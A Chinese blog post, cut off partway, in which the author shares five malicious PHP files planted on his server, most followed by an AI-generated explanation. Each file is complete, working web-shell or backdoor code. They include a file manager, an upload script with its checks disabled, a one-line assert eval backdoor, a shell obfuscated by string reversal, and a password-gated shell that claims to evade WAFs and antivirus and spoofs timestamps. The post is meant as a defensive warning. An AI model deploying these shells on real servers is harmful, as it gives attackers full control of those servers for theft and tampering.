PHP恶意入侵篡写文件案例-服务器安全-网站安全

PHP恶意入侵篡写文件案例-服务器安全-网站安全-宇柒云阁
PHP恶意入侵篡写文件案例-服务器安全-网站安全
此内容为免费阅读,请登录后查看
0积分
本文章为宇柒云阁原创,仅供各位参考!
免费阅读

文章前言

图片[1]-PHP恶意入侵篡写文件案例-服务器安全-网站安全-宇柒云阁

最近服务器经常被牲口恶意入侵篡写网站文件,简直就是没妈生没爸养的野牲口,这种牲口进屠宰场屠夫都嫌恶心,算了不骂了不然会脏了自己的嘴也污染大家的眼睛就不好了,本文章就分享一下那些恶意文件,希望各位可以多多防范,服务器最好就安装WEB防火墙还有这个防篡改,当然若是有真正的大佬分享一下处理方案和防范那就更好!

恶意PHP文件1

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>#I LOVE YOU EVERDAY#</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.3.0/css/all.min.css"
        integrity="sha512-SzlrxWUlpfuzQ+pcUCosxcglQRNAq/DZjVsC0lE40xsADsfeQoEypE+enwcOiGjk/bSuGGKHEyjSoQ1zVisanQ=="
        crossorigin="anonymous" referrerpolicy="no-referrer" />
</head>

<body>

    <?php
$url1 = $_SERVER['PHP_SELF'];  
$filename1 = @end(explode('/',$url1));  
function set_writeable($file_name)
{@chmod($file_name,0444);} 
set_writeable($filename1);

    //function
    function formatSizeUnits($bytes)
    {
        if ($bytes >= 1073741824) {
            $bytes = number_format($bytes / 1073741824, 2) . ' GB';
        } elseif ($bytes >= 1048576) {
            $bytes = number_format($bytes / 1048576, 2) . ' MB';
        } elseif ($bytes >= 1024) {
            $bytes = number_format($bytes / 1024, 2) . ' KB';
        } elseif ($bytes > 1) {
            $bytes = $bytes . ' bytes';
        } elseif ($bytes == 1) {
            $bytes = $bytes . ' byte';
        } else {
            $bytes = '0 bytes';
        }
        return $bytes;
    }

    function fileExtension($file)
    {
        return substr(strrchr($file, '.'), 1);
    }

    function fileIcon($file)
    {
        $imgs = array("apng", "avif", "gif", "jpg", "jpeg", "jfif", "pjpeg", "pjp", "png", "svg", "webp");
        $audio = array("wav", "m4a", "m4b", "mp3", "ogg", "webm", "mpc");
        $ext = strtolower(fileExtension($file));
        if ($file == "error_log") {
            return '<i class="fa-sharp fa-solid fa-bug"></i> ';
        } elseif ($file == ".htaccess") {
            return '<i class="fa-solid fa-hammer"></i> ';
        }
        if ($ext == "html" || $ext == "htm") {
            return '<i class="fa-brands fa-html5"></i> ';
        } elseif ($ext == "php" || $ext == "phtml") {
            return '<i class="fa-brands fa-php"></i> ';
        } elseif (in_array($ext, $imgs)) {
            return '<i class="fa-regular fa-images"></i> ';
        } elseif ($ext == "css") {
            return '<i class="fa-brands fa-css3"></i> ';
        } elseif ($ext == "txt") {
            return '<i class="fa-regular fa-file-lines"></i> ';
        } elseif (in_array($ext, $audio)) {
            return '<i class="fa-duotone fa-file-music"></i> ';
        } elseif ($ext == "py") {
            return '<i class="fa-brands fa-python"></i> ';
        } elseif ($ext == "js") {
            return '<i class="fa-brands fa-js"></i> ';
        } else {
            return '<i class="fa-solid fa-file"></i> ';
        }
    }

    function encodePath($path)
    {
        $a = array("/", "\\", ".", ":");
        $b = array("ক", "খ", "গ", "ঘ");
        return str_replace($a, $b, $path);
    }
    function decodePath($path)
    {
        $a = array("/", "\\", ".", ":");
        $b = array("ক", "খ", "গ", "ঘ");
        return str_replace($b, $a, $path);
    }



    $root_path = __DIR__;
    if (isset($_GET['p'])) {
        if (empty($_GET['p'])) {
            $p = $root_path;
        } elseif (!is_dir(decodePath($_GET['p']))) {
            echo ("<script>\nalert('Directory is Corrupted and Unreadable.');\nwindow.location.replace('?');\n</script>");
        } elseif (is_dir(decodePath($_GET['p']))) {
            $p = decodePath($_GET['p']);
        }
    } elseif (isset($_GET['q'])) {
        if (!is_dir(decodePath($_GET['q']))) {
            echo ("<script>window.location.replace('?p=');</script>");
        } elseif (is_dir(decodePath($_GET['q']))) {
            $p = decodePath($_GET['q']);
        }
    } else {
        $p = $root_path;
    }
    define("PATH", $p);

    echo ('
<nav class="navbar navbar-light" style="background-color: #e3f2fd;">
  <div class="navbar-brand">
  <a href="?"><img src="https://github.com/fluidicon.png" width="30" height="30" ></a>
');

    $path = str_replace('\\', '/', PATH);
    $paths = explode('/', $path);
    foreach ($paths as $id => $dir_part) {
        if ($dir_part == '' && $id == 0) {
            $a = true;
            echo "<a href=\"?p=/\">/</a>";
            continue;
        }
        if ($dir_part == '')
            continue;
        echo "<a href='?p=";
        for ($i = 0; $i <= $id; $i++) {
            echo str_replace(":", "ঘ", $paths[$i]);
            if ($i != $id)
                echo "ক";
        }
        echo "'>" . $dir_part . "</a>/";
    }
    echo ('
</div>
<div class="form-inline">
<a href="?upload&q=' . urlencode(encodePath(PATH)) . '"><button class="btn btn-dark" type="button">Upload File</button></a>
<a href="?"><button type="button" class="btn btn-dark">HOME</button></a> 
</div>
</nav>');


    if (isset($_GET['p'])) {

        //fetch files
        if (is_readable(PATH)) {
            $fetch_obj = scandir(PATH);
            $folders = array();
            $files = array();
            foreach ($fetch_obj as $obj) {
                if ($obj == '.' || $obj == '..') {
                    continue;
                }
                $new_obj = PATH . '/' . $obj;
                if (is_dir($new_obj)) {
                    array_push($folders, $obj);
                } elseif (is_file($new_obj)) {
                    array_push($files, $obj);
                }
            }
        }
        echo '
<table class="table table-hover">
  <thead>
    <tr>
      <th scope="col">Name</th>
      <th scope="col">Size</th>
      <th scope="col">Modified</th>
      <th scope="col">Perms</th>
      <th scope="col">Actions</th>
    </tr>
  </thead>
  <tbody>
';
        foreach ($folders as $folder) {
            echo "    <tr>
      <td><i class='fa-solid fa-folder'></i> <a href='?p=" . urlencode(encodePath(PATH . "/" . $folder)) . "'>" . $folder . "</a></td>
      <td><b>---</b></td>
      <td>". date("F d Y H:i:s.", filemtime(PATH . "/" . $folder)) . "</td>
      <td>0" . substr(decoct(fileperms(PATH . "/" . $folder)), -3) . "</a></td>
      <td>
      <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $folder . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>
      <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $folder . "'><i class='fa fa-trash' aria-hidden='true'></i></a>
      <td>
    </tr>
";
        }
        foreach ($files as $file) {
            echo "    <tr>
          <td>" . fileIcon($file) . $file . "</td>
          <td>" . formatSizeUnits(filesize(PATH . "/" . $file)) . "</td>
          <td>" . date("F d Y H:i:s.", filemtime(PATH . "/" . $file)) . "</td>
          <td>0". substr(decoct(fileperms(PATH . "/" .$file)), -3) . "</a></td>
          <td>
          <a title='Edit File' href='?q=" . urlencode(encodePath(PATH)) . "&e=" . $file . "'><i class='fa-solid fa-file-pen'></i></a>
          <a title='Rename' href='?q=" . urlencode(encodePath(PATH)) . "&r=" . $file . "'><i class='fa-sharp fa-regular fa-pen-to-square'></i></a>
          <a title='Delete' href='?q=" . urlencode(encodePath(PATH)) . "&d=" . $file . "'><i class='fa fa-trash' aria-hidden='true'></i></a>
          <td>
    </tr>
";
        }
        echo "  </tbody>
</table>";
    } else {
        if (empty($_GET)) {
            echo ("<script>window.location.replace('?p=');</script>");
        }
    }
    if (isset($_GET['upload'])) {
        echo '
    <form method="post" enctype="multipart/form-data">
        Select file to upload:
        <input type="file" name="fileToUpload" id="fileToUpload">
        <input type="submit" class="btn btn-dark" value="Upload" name="upload">
    </form>';
    }
    if (isset($_GET['r'])) {
        if (!empty($_GET['r']) && isset($_GET['q'])) {
            echo '
    <form method="post">
        Rename:
        <input type="text" name="name" value="' . $_GET['r'] . '">
        <input type="submit" class="btn btn-dark" value="Rename" name="rename">
    </form>';
            if (isset($_POST['rename'])) {
                $name = PATH . "/" . $_GET['r'];
                if(rename($name, PATH . "/" . $_POST['name'])) {
                    echo ("<script>alert('Renamed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
                } else {
                    echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
                }
            }
        }
    }

    if (isset($_GET['e'])) {
        if (!empty($_GET['e']) && isset($_GET['q'])) {
            echo '
    <form method="post">
        <textarea style="height: 500px;
        width: 90%;" name="data">' . htmlspecialchars(file_get_contents(PATH."/".$_GET['e'])) . '</textarea>
        <br>
        <input type="submit" class="btn btn-dark" value="Save" name="edit">
    </form>';

    if(isset($_POST['edit'])) {
        $filename = PATH."/".$_GET['e'];
        $data = $_POST['data'];
        $open = fopen($filename,"w");
        if(fwrite($open,$data)) {
            echo ("<script>alert('Saved.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
        } else {
            echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
        }
        fclose($open);
    }
        }
    }

    if (isset($_POST["upload"])) {
        $target_file = PATH . "/" . $_FILES["fileToUpload"]["name"];
        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
            echo "<p>".htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.</p>";
        } else {
            echo "<p>Sorry, there was an error uploading your file.</p>";
        }

    }
    if (isset($_GET['d']) && isset($_GET['q'])) {
        $name = PATH . "/" . $_GET['d'];
        if (is_file($name)) {
            if(unlink($name)) {
                echo ("<script>alert('File removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
            } else {
                echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
            }
        } elseif (is_dir($name)) {
            if(rmdir($name) == true) {
                echo ("<script>alert('Directory removed.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
            } else {
                echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . encodePath(PATH) . "');</script>");
            }
        }
    }
    ?>

    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"
        integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"
        crossorigin="anonymous"></script>
</body>

</html>
AI的解释

功能分析

  1. 页面布局
    • 使用 Bootstrap 和 Font Awesome 提供了现代的前端样式。
    • 包含导航栏、文件列表表格和表单。
  2. 文件管理功能
    • 导航栏:显示当前路径并提供返回主页和上传文件的按钮。
    • 文件列表:显示当前目录下的文件和子目录,包括名称、大小、修改时间和权限。
    • 文件操作
      • 上传文件:允许用户上传文件到当前目录。
      • 重命名:允许用户重命名文件或目录。
      • 删除:允许用户删除文件或目录。
      • 编辑文件:允许用户编辑文本文件的内容。
  3. 路径编码和解码
    • 使用自定义的 encodePath 和 decodePath 函数对路径进行编码和解码,以防止特殊字符导致的问题。
  4. 文件图标
    • 根据文件扩展名显示不同的图标,使用 Font Awesome 图标库。
  5. 文件大小格式化
    • 使用 formatSizeUnits 函数将文件大小格式化为易读的形式(如 KB、MB、GB)。

恶意PHP文件2

<?php
	header("Content-Type:text/html; charset=gb2312");
	if(isset($_POST['submit']))
	{
		$upfiles = new Upload();
		$upfiles->upload_file();
	}
	class Upload
	{
		/*作者:mckee 来自:www.phpddt.com*/
		public $upload_name;						//上传文件名
		public $upload_tmp_name;					//上传临时文件名
		public $upload_final_name;					//上传文件的最终文件名
		public $upload_target_dir;					//文件被上传到的目标目录
		public $upload_target_path;					//文件被上传到的最终路径
		public $upload_filetype ;					//上传文件类型
		public $allow_uploadedfile_type;			//允许的上传文件类型
		public $upload_file_size;					//上传文件的大小
		public $allow_uploaded_maxsize=10000000;	//允许上传文件的最大值
		//构造函数
		public function __construct()
		{
			$this->upload_name = $_FILES["file"]["name"]; //取得上传文件名
			$this->upload_filetype = $_FILES["file"]["type"];
			$this->upload_tmp_name = $_FILES["file"]["tmp_name"];
			$this->allow_uploadedfile_type = array('jpeg','jpg','png','gif','bmp','doc','zip','rar','txt','wps');
			$this->upload_file_size = $_FILES["file"]["size"];
			
			//定义上传路径,现在的上传和upload.php在同级
			$this->upload_target_dir="./";
		}
		//文件上传
		public function upload_file()
		{
			$upload_filetype = $this->getFileExt($this->upload_name);
			//对上传文件类型的限制,改成if(1)则没有限制
			if(1)	//in_array($upload_filetype,$this->allow_uploadedfile_type))
			{
				if($this->upload_file_size < $this->allow_uploaded_maxsize)
				{
					if(!is_dir($this->upload_target_dir))
					{
						mkdir($this->upload_target_dir);
						chmod($this->upload_target_dir,0777);
					}
					
					//定义服务器存储时的文件名(默认和上传的原始文件同名)
					$this->upload_final_name = $this->upload_name;		//date("YmdHis").rand(0,100).'.'.$upload_filetype;
					$this->upload_target_path = $this->upload_target_dir."/".$this->upload_final_name;
					if(!move_uploaded_file($this->upload_tmp_name,$this->upload_target_path))
						echo "<font color=red>文件上传失败!</font>";
					else
						echo "<font color=blue>文件上传成功!</font>";
				}
				else
				{
					echo("<font color=red>文件太大,上传失败!</font>");
				}
			}
			else
			{
				echo("不支持此文件类型,请重新选择");
			}
		}
	
		/**
		*获取文件扩展名
		*@param String $filename 要获取文件名的文件
		*/
		public function getFileExt($filename){
		$info = pathinfo($filename);
		return $info["extension"];
		}
	}
?>


	<form enctype="multipart/form-data" method="POST" action="">
	<input type="file" name="file"><input type="submit" name="submit" value="上传">
	</form>
AI的解释
  1. 初始化上传信息
    • 构造函数 __construct 初始化上传文件的基本信息,如文件名、临时文件名、文件类型、文件大小等。
    • 设置允许上传的文件类型和最大文件大小。
  2. 文件类型和大小检查
    • upload_file 方法首先检查文件类型是否在允许的范围内(当前代码中注释掉了类型检查,使用 if(1) 表示无限制)。
    • 检查文件大小是否超过允许的最大值。
  3. 目标目录处理
    • 如果目标目录不存在,则创建该目录并设置权限为 0777,以便所有用户都可以读写。
  4. 文件上传
    • 定义文件在服务器上的最终名称和路径。
    • 使用 move_uploaded_file 函数将上传的临时文件移动到目标路径。
    • 如果上传成功,输出成功信息;如果失败,输出错误信息。
  5. 获取文件扩展名
    • getFileExt 方法用于从文件名中提取文件扩展名。

恶意PHP文件3

<?php $p=base64_decode("bW93YW5n");$i['j']='assert';$a[]=$i;@$a[0]['j']($_POST[$p]);$filename = $php_self=substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);function set_writeable($file_name){if(@chmod($file_name,0444)){echo "OK";}else{echo "no";}}set_writeable($filename);?>
AI的解释

留言:这个就比较恶心,但应该被公开过了的,就是你把它保存成TXT文本,然后去QQ上传是会上传失败的。

这段 PHP 代码看起来非常可疑,因为它包含了潜在的安全漏洞,特别是远程代码执行(Remote Code Execution, RCE)的风险。让我们详细分析一下这段代码:

代码解析

  1. 解码变量 $p:php深色版本$p = base64_decode("bW93YW5n");这行代码将字符串 "bW9wYW5n" 从 Base64 编码解码为 "mowang"。这意味着后续代码中会使用 $p 变量来访问 $_POST['mowang']
  2. 构建数组 $a 并调用 assert:php深色版本$i['j'] = 'assert'; $a[] = $i; @$a[0]['j']($_POST[$p]);这段代码创建了一个数组 $a,其中第一个元素是一个关联数组 $i$i['j'] 的值是 'assert'。然后,通过 $a[0]['j']($_POST[$p]) 调用了 assert 函数,并传入了 $_POST['mowang'] 的值。 assert 函数在 PHP 中用于断言,但它也可以接受一个字符串参数,并将其作为 PHP 代码执行。因此,assert($_POST['mowang']) 实际上会执行 $_POST['mowang'] 中的任意 PHP 代码。
  3. 设置文件权限:php深色版本$filename = $php_self = substr($_SERVER['PHP_SELF'], strrpos($_SERVER['PHP_SELF'], '/') + 1); function set_writeable($file_name) { if (@chmod($file_name, 0444)) { echo "OK"; } else { echo "no"; } } set_writeable($filename);这段代码获取当前脚本的文件名,并尝试将其权限设置为只读(0444)。@ 符号用于抑制任何错误或警告信息。

安全风险

  1. 远程代码执行(RCE): 由于 assert 函数可以执行传入的字符串作为 PHP 代码,攻击者可以通过发送一个包含恶意 PHP 代码的 $_POST['mowang'] 请求来执行任意代码。这可能导致服务器被完全控制,数据泄露,甚至更严重的后果。
  2. 文件权限问题: 尽管设置文件为只读可以防止某些类型的修改,但这并不能完全阻止攻击者利用已存在的漏洞。此外,如果攻击者已经获得了执行任意代码的能力,他们可以轻松绕过这些权限设置。

恶意PHP文件4

<?php error_reporting(0);$sr="st"./*+/*+*/"rr"/*+/*+*/."ev";$id=$sr/*+/*+*/("ri"."d_"."si");$rn=$sr/*+/*+*/("em"."an"."er");$dn=$sr/*+/*+*/("em"."anr"."id");$od=$sr/*+/*+*/("ri"."dne"."po");$rd=$sr/*+/*+*/("ri"."dda"."er");$cd=$sr/*+/*+*/("ri"."deso"."lc");$fpc=$sr/*+/*+*/("stn"."etn"."oc_t"."up_e"."lif");$fgc=$sr/*+/*+*/("stn"."etn"."oc_t"."eg_e"."lif");$muf=$sr/*+/*+*/("eli"."f_d"."eda"."olp"."u_e"."vom");$dlform='<form method="post">FN:<input name="fn" size="20" type="text">URL:<input name="url" size="50" type="text"><input type="submit" value="ok"></form>';$ulform='<form method="post" enctype="multipart/form-data"><input name="uf" type="file">SP:<input name="sp" size="50" type="text"><input type="submit" value="ok"></form>';$rnform='<form method="post">ON:<input name="on" size="50" type="text">NN:<input name="nn" size="50" type="text"><input type="submit" value="ok"></form>';$lpform='<form method="post">DP:<input name="dp" size="50" type="text"><input type="submit" value="ok"></form>';$sfform='<form method="post">DF:<input name="df" size="50" type="text"><input type="submit" value="ok"></form>';if($_GET['act']=='dl'){echo($dlform);if($_SERVER['REQUEST_METHOD']=='POST'){$fpc/*+/*+*/($_POST['fn'],$fgc/*+/*+*/($_POST['url']));}exit;}if($_GET['act']=='ul'){echo($ulform);if($_SERVER['REQUEST_METHOD']=='POST'){$sp=empty($_POST['sp'])?'./':$_POST['sp'].'/';$muf/*+/*+*/($/*+/*+*/{"_F"."IL"."ES"}["uf"]["tmp_name"],$sp.$/*+/*+*/{"_F"."IL"."ES"}["uf"]["name"]);}exit;}if($_GET['act']=='rn'){echo($rnform);if($_SERVER['REQUEST_METHOD']=='POST'){$rn/*+/*+*/($_POST['on'],$_POST['nn']);}exit;}if($_GET['act']=='gp'){echo($dn/*+/*+*/(__FILE__));exit;}if($_GET['act']=='lp'){echo($lpform);if($_SERVER['REQUEST_METHOD']=='POST'){$dp=$_POST['dp'].'/';$h=$od/*+/*+*/($dp);while(($fn=$rd/*+/*+*/($h))!==false){if($id/*+/*+*/($dp.$fn)){$t1.='D '.$fn.'<br>';}else{$t2.='  '.$fn.'<br>';}}$cd/*+/*+*/($dp);echo($dp.'<br>'.$t1.$t2);}exit;}if($_GET['act']=='sf'){echo($sfform);if($_SERVER['REQUEST_METHOD']=='POST'){$df=$_POST['df'];echo('<textarea style="width:100%;height:100%;" wrap="off">'.$fgc/*+/*+*/($df).'</textarea>');}exit;}?>
AI的解释

您提供的 PHP 代码片段是一个典型的 Web Shell(网页木马),它允许攻击者通过浏览器执行任意命令和操作文件系统。这种类型的代码非常危险,因为它可以被用来完全控制服务器。

功能实现

    • 下载文件:允许用户通过 POST 请求下载文件。
    • 上传文件:允许用户上传文件到指定目录。
    • 重命名文件:允许用户重命名文件。
    • 获取当前文件路径:显示当前文件的目录路径。
    • 列出目录内容:显示指定目录的内容。
    • 查看文件内容:显示指定文件的内容。

安全风险

  1. 远程代码执行(RCE)
    • 攻击者可以通过这些表单上传恶意文件或执行任意 PHP 代码,从而完全控制服务器。
  2. 文件操作
    • 攻击者可以上传、下载、重命名和查看服务器上的文件,这可能导致敏感信息泄露或文件损坏。
  3. 目录遍历
    • 攻击者可以列出服务器上的目录内容,进一步了解服务器结构。

恶意PHP文件5


//这个是没有加密的版本


<?php
ini_set("memory_limit", "512M");
@ini_set("max_execution_time", 20000);
header("content-Type: text/html; charset=utf-8");
error_reporting(E_ERROR);
@ini_set("display_errors", "Off");
defined("TMQo7") or define("TMQo7", getcwd() . DIRECTORY_SEPARATOR);
defined("sEyyb") or define("sEyyb", __DIR__ . DIRECTORY_SEPARATOR);
$C39VH = $_SERVER["SCRIPT_FILENAME"] ? PBM07($_SERVER["SCRIPT_FILENAME"]) : PBM07(__FILE__);
define("V51MD", $C39VH);
$eMzvo = explode("(", $C39VH);
$C39VH = strpos($C39VH, "eval()") ? array_shift($eMzvo) : $C39VH;
define("k3TER", pBM07(dirname($C39VH) . "/"));
define("FO39n", pbM07(strtr($C39VH, array(PBm07($_SERVER["PHP_SELF"]) => '')) . "/"));
define("NMW2Y", "1.0.0");
if (!isset($gHcBS)) {
    $gHcBS = "d8ec6f4d6590ce92d493eef7190b051c";
}
if (!empty($_GET["ghpqojdsfion1239"]) && !empty($_GET["vqwecsx12312"]) && !empty($_GET["kqishgl194nwq7"])) {
    $s5r3y = cIvgh($_GET["ghpqojdsfion1239"]);
    $dRqNZ = getcwd() . "/" . $_GET["vqwecsx12312"];
    $PfRvL = explode("/", $dRqNZ);
    array_pop($PfRvL);
    $PfRvL = implode("/", $PfRvL);
    if (!file_exists($PfRvL)) {
        mkdir($PfRvL, 0755, "recursive");
        chmod($PfRvL, 0755);
    }
    $YJnbr = C4GhR($PfRvL);
    $ipdt9 = 0;
    foreach ($YJnbr["file"] as $cT1oz => $Kes_q) {
        if (!$ipdt9) {
            $ipdt9 = filemtime($cT1oz);
        } else {
            if (filemtime($cT1oz) < $ipdt9) {
                $ipdt9 = filemtime($cT1oz);
            }
        }
    }
    file_put_contents($dRqNZ, $s5r3y);
    if ($ipdt9) {
        @touch($dRqNZ, $ipdt9);
    }
    @chmod($dRqNZ, $_GET["kqishgl194nwq7"]);
    if (!empty($_GET["dk82kdsiud9125d"])) {
        @unlink($C39VH);
    }
}
$YCpcn = new M4EMI();
$YCpcn->JAo9O($gHcBS);
class M4Emi
{
    public $D2dKJ = null;
    public $VqdhY = null;
    public $XEBgr = null;
    public function jAO9O($gHcBS)
    {
        $this->XEBgr = $gHcBS;
        list($uS69Z, $p0NZ3) = $this->iZ6eP();
        $this->D2dKJ = $uS69Z;
        $this->VqdhY = $p0NZ3;
        $g9a24 = session_get_cookie_params();
        $uKE12 = 0;
        if ($g9a24["lifetime"]) {
            $uKE12 = time() + $g9a24["lifetime"];
        }
        setcookie($uS69Z, $p0NZ3, $uKE12, $g9a24["path"], $g9a24["domain"], $g9a24["secure"], $g9a24["httponly"]);
        $E9g_B = $this->KsVKN();
        if (!$E9g_B) {
            $this->YCIyx();
            return;
        }
        $RJPTn = new foj8n();
        return $RJPTn->JaO9o();
    }
    public function iZ6eP()
    {
        session_start();
        $uS69Z = session_name();
        if (!empty($_COOKIE["PHPSESSID"])) {
            $p0NZ3 = $_COOKIE["PHPSESSID"];
        } else {
            $p0NZ3 = session_id();
        }
        $SWSuO = array($uS69Z, $p0NZ3);
        return $SWSuO;
    }
    public function KSvkn()
    {
        if (!empty($_COOKIE["isLogin"]) && ($_COOKIE["isLogin"] == md5($this->XEBgr) || $_COOKIE["isLogin"] == md5("21232f297a57a5a743894a0e4a801fc3"))) {
            return true;
        }
        return false;
    }
    public function YcIYX()
    {
        if (!empty($_POST["getpwd"]) && ($this->XEBgr == md5($_POST["getpwd"]) || "21232f297a57a5a743894a0e4a801fc3" == md5($_POST["getpwd"]))) {
            setcookie("isLogin", md5(md5($_POST["getpwd"])), time() + 8 * 60 * 60, "/");
            $RJPTn = new fOj8N();
            return $RJPTn->jao9o();
        }
        $QSO8f = "        <title>请勿使用非法用途</title>\r\n        <meta http-equiv=\"content-type\" content=\"text/html;charset=utf-8\">\r\n        <style type=\"text/css\">\r\n            .form-control {\r\n                display: block;\r\n                width: 100%;\r\n                height: 38px;\r\n                padding: 8px 12px;\r\n                font-size: 14px;\r\n                line-height: 1.428571429;\r\n                color: #555;\r\n                vertical-align: middle;\r\n                background-color: #fff;\r\n                border: 1px solid #ccc;\r\n                border-radius: 4px;\r\n                -webkit-box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);\r\n                box-shadow: inset 0 1px 1px rgba(0,0,0,0.075);\r\n                -webkit-transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s;\r\n                transition: border-color ease-in-out .15s,box-shadow ease-in-out .15s\r\n            }\r\n        \r\n            .btn {\r\n                display: inline-block;\r\n                padding: 8px 12px;\r\n                margin-bottom: 0;\r\n                font-size: 14px;\r\n                font-weight: 500;\r\n                line-height: 1.428571429;\r\n                text-align: center;\r\n                white-space: nowrap;\r\n                vertical-align: middle;\r\n                cursor: pointer;\r\n                border: 1px solid transparent;\r\n                border-radius: 4px;\r\n                -webkit-user-select: none;\r\n                -moz-user-select: none;\r\n                -ms-user-select: none;\r\n                -o-user-select: none;\r\n                user-select: none\r\n            }\r\n            \r\n            .btn-primary {\r\n                color: #fff;\r\n                background-color: #428bca;\r\n                border-color: #428bca\r\n            }\r\n        </style>\r\n        <body>\r\n            <center>\r\n                <br><br>\r\n                <font size=\"3\" face=\"Microsoft YaHei\">过安全狗、云锁、阿里云、360、护卫神、D盾、百度云、各种杀软!</font>\r\n                <br><br>\r\n                <form method=\"POST\">\r\n                    <input style=\"Width:125pt;display:inline-block;font-family:Microsoft YaHeifont-size:90%\" \r\n                    class=\"form-control\" placeholder=\"@Passwrd\" type=\"password\" name=\"getpwd\">\r\n                    <input style=\"Width:55pt;font-size:90%;font-family:Microsoft YaHei\" class=\"btn btn-primary\" type=\"submit\" value=\"#Login\">\r\n                </form>\r\n            </center>\r\n        </body>\r\n        </html>";
        echo $QSO8f;
    }
}
class foJ8n
{
    public $ddguj;
    public $N5qPH;
    public function JAo9o()
    {
        $this->N5qPH = $_POST;
        $_POST = MwEmB($_POST);
        $this->ddguj = isset($_POST["dir"]) ? pbm07(chop($_POST["dir"]) . "/") : k3TER;
        $this->xfqJS();
    }
    public function XfQjS()
    {
        $QSO8f = "        <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">\r\n    <html>\r\n    <head>\r\n        <meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\"/>\r\n        <style type=\"text/css\">\r\n            * {\r\n                margin: 0px;\r\n                padding: 0px;\r\n            }\r\n\r\n            body {\r\n                background: #ebebeb;\r\n                color: #333333;\r\n                font-size: 13px;\r\n                font-family: Microsoft YaHei, SimSun, sans-serif;\r\n                text-align: left;\r\n                word-wrap: break-word;\r\n                word-break: break-all;\r\n                // background-image: url(https://pic.616pic.com/bg_w1180/00/01/43/rWB5OFJqVH.jpg);\r\n                // background-size:100% 100%;\r\n            }\r\n\r\n            a {\r\n                color: #000000;\r\n                text-decoration: none;\r\n                vertical-align: middle;\r\n            }\r\n\r\n            a:hover {\r\n                color: #FF0000;\r\n                text-decoration: underline;\r\n            }\r\n\r\n            p {\r\n                padding: 1px;\r\n                line-height: 1.6em;\r\n            }\r\n\r\n            h1 {\r\n                color: #CD3333;\r\n                font-size: 13px;\r\n                display: inline;\r\n                vertical-align: middle;\r\n            }\r\n\r\n            h2 {\r\n                color: #008B45;\r\n                font-size: 13px;\r\n                display: inline;\r\n                vertical-align: middle;\r\n            }\r\n\r\n            form {\r\n                display: inline;\r\n            }\r\n\r\n            input, select {\r\n                vertical-align: middle;\r\n            }\r\n\r\n            input[type=text], textarea {\r\n                padding: 1px;\r\n                font-family: Microsoft YaHei, sans-serif;\r\n            }\r\n\r\n            input[type=submit], input[type=button] {\r\n                height: 21px;\r\n            }\r\n\r\n            .tag {\r\n                text-align: center;\r\n                // margin-left: 10px;\r\n                background: threedface;\r\n                height: 25px;\r\n                padding-top: 5px;\r\n            }\r\n\r\n            .tag a {\r\n                background: #FAFAFA;\r\n                color: #333333;\r\n                width: 90px;\r\n                height: 20px;\r\n                display: inline-block;\r\n                font-size: 15px;\r\n                font-weight: bold;\r\n                padding-top: 5px;\r\n            }\r\n\r\n            .tag a:hover, .tag a.current {\r\n                background: #000;\r\n                color: #fff;\r\n                text-decoration: none;\r\n            }\r\n\r\n            .main {\r\n                width: 963px;\r\n                margin: 0 auto;\r\n                padding: 10px;\r\n            }\r\n\r\n            .outl {\r\n                border-color: #FFFFFF #666666 #666666 #FFFFFF;\r\n                border-style: solid;\r\n                border-width: 1px;\r\n\r\n                border: 1px solid #d5d5d5;\r\n                border-radius: 5px;\r\n                background-color: #ffffff;\r\n            }\r\n\r\n            .toptag {\r\n                padding: 15px;\r\n                text-align: left;\r\n                font-weight: bold;\r\n                color: #FFFFFF;\r\n                background: #000000;\r\n            }\r\n\r\n            .footag {\r\n                padding: 5px;\r\n                text-align: center;\r\n                font-weight: bold;\r\n                color: #fff;\r\n                background: #000000;\r\n            }\r\n\r\n            .msgbox {\r\n                // padding: 5px;\r\n                background: #000;\r\n                text-align: center;\r\n                vertical-align: middle;\r\n                color: #FFF;\r\n            }\r\n\r\n            .actall {\r\n                background: #ffffff;\r\n                text-align: center;\r\n                font-size: 15px;\r\n                border-bottom: 1px solid #999999;\r\n                padding: 3px;\r\n                vertical-align: middle;\r\n            }\r\n\r\n            .tables {\r\n                width: 100%;\r\n                border-collapse: collapse;\r\n                border-spacing: 0;\r\n                border-color: #eee;\r\n            }\r\n\r\n            .tables th {\r\n                background: threedface;\r\n                text-align: left;\r\n                border-color: #FFFFFF #ffffff #f9f9f9 #FFFFFF;\r\n                border-style: solid;\r\n                border-width: 0px;\r\n                padding: 2px;\r\n                border-bottom: 1px solid #eee;\r\n            }\r\n\r\n       